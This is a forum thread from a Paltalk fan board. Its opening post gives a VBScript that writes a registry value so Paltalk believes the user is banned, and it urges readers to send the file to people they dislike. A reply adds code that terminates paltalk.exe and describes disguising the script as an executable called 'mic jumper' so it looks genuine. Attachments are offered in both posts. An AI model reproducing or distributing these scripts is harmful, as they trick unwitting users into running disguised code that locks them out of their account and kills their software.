How to Ban in paltalk

p.icon General Talk about Paltalk

Moderator: amirca

Forum rules
Please do not post any : cracks , keygens , trojans , mp3,s , etc to this forums. All post including this will be removed !

How to Ban in paltalk

Postby akhminkom » May 18th, '09, 21:29

ok this is just for fun , paltalk add registry value in your Computer when they ban you the name of it is "pgnumber" and the value they use " 1,2 ,3 ,4,5" so it look somthink like:
"HKEY_CURRENT_USER\Software\Microsoft\NSPlugins\pgnumber", 00000005, "REG_DWORD"
now what we gona do is Create that entry and give it value in registry using WS Script
Open notepad and Copy and paste the Script below

Set objShell = WScript.CreateObject("WScript.Shell")
objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\NSPlugins\pgnumber", 00000005, "REG_DWORD"
MsgBox "You have been baned!",, "baned!"

now save it as make sure you select All files from save as type and give it a name with extension .vbs
somthing like "ban.vbs" ,click the file you saved you will get msg saying "You have been baned!" now try to log to paltalk and see if you get a msg from paltalk saying " This account bla bla (tc5605)"
now you can send the Script file to ppl you dont like in paltalk.

Next lets do the unbanning
all we need to do is make Script to Delete the Key in registry ,copy and paste the Script in notepad

Dim WshShell, pgnumber
Set WshShell = WScript.CreateObject("WScript.Shell")
pgnumber = "HKEY_CURRENT_USER\Software\Microsoft\NSPlugins\pgnumber"
wshShell.RegDelete pgnumber
MsgBox "You have been ubaned!",, "ubaned!"

do the same steps as the first script ,it should remove the ban ,for windows Vista Run it as Admin.
Attachments
baned.rar
(476 Bytes) Downloaded 419 times
akhminkom
Dutchplace
Dutchplace
 
Posts: 108
Joined: Sep 21st, '07, 06:46

Re: How to Ban in paltalk

Postby amit_chopra12345 » May 19th, '09, 10:16

thnx bro. cheer
Paltalk n My gf n my parents.

paltalk nickname :- amit UnBeataBle
sipprotocols@gmail.com for any help.
amit_chopra12345
Dutchplace Advanced Member
Dutchplace Advanced Member
 
Posts: 94
Joined: Jul 25th, '08, 21:09
Location: india

Re: How to Ban in paltalk

Postby azelbekk » May 29th, '09, 11:59

Because all crack my nickname its ban paltalk :evil:

Akhminkom tis programme work only black nick

Not green nick..... help my plz :(
azelbekk
Dutchplace Member
Dutchplace Member
 
Posts: 17
Joined: Dec 23rd, '08, 17:29

Re: How to Ban in paltalk

Postby ll F4T4L B34TS ll » Feb 7th, '10, 01:36

That was a really nice code. I found out that when your on paltalk, and you click on the vbs script. The script works but paltalk doesn't close. I found a code that you can add to that script that closes the process paltalk.exe:

strComputer = "."
strProcessToKill = "paltalk.exe"

SET objWMIService = GETOBJECT("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" _
& strComputer & "\root\cimv2")

SET colProcess = objWMIService.ExecQuery _
("Select * from Win32_Process Where Name = '" & strProcessToKill & "'")

count = 0
FOR EACH objProcess in colProcess
objProcess.Terminate()
count = count + 1
NEXT


I added that code after the origanal, and it worked. I converted the vbs script to an exe file and named it mic jumper. Looks pretty much real now. I use this to prank my friends when they are on my computer. Thanks akhminkom

Attached is the original unbanner posted by akhminkom and the modified .exe banner.
Attachments
Paltalk Bann.zip
(95.47 KiB) Downloaded 212 times
Image
User avatar
ll F4T4L B34TS ll
Dutchplace Member
Dutchplace Member
 
Posts: 41
Joined: Jun 1st, '09, 19:20
Location: Earth

Re: How to Ban in paltalk

Postby DND » Feb 15th, '10, 18:24

Thanks akhminkom it was help full
User avatar
DND
Dutchplace Member
Dutchplace Member
 
Posts: 16
Joined: Nov 19th, '08, 16:42


Return to Paltalk General

Who is online

Users browsing this forum: No registered users and 1 guest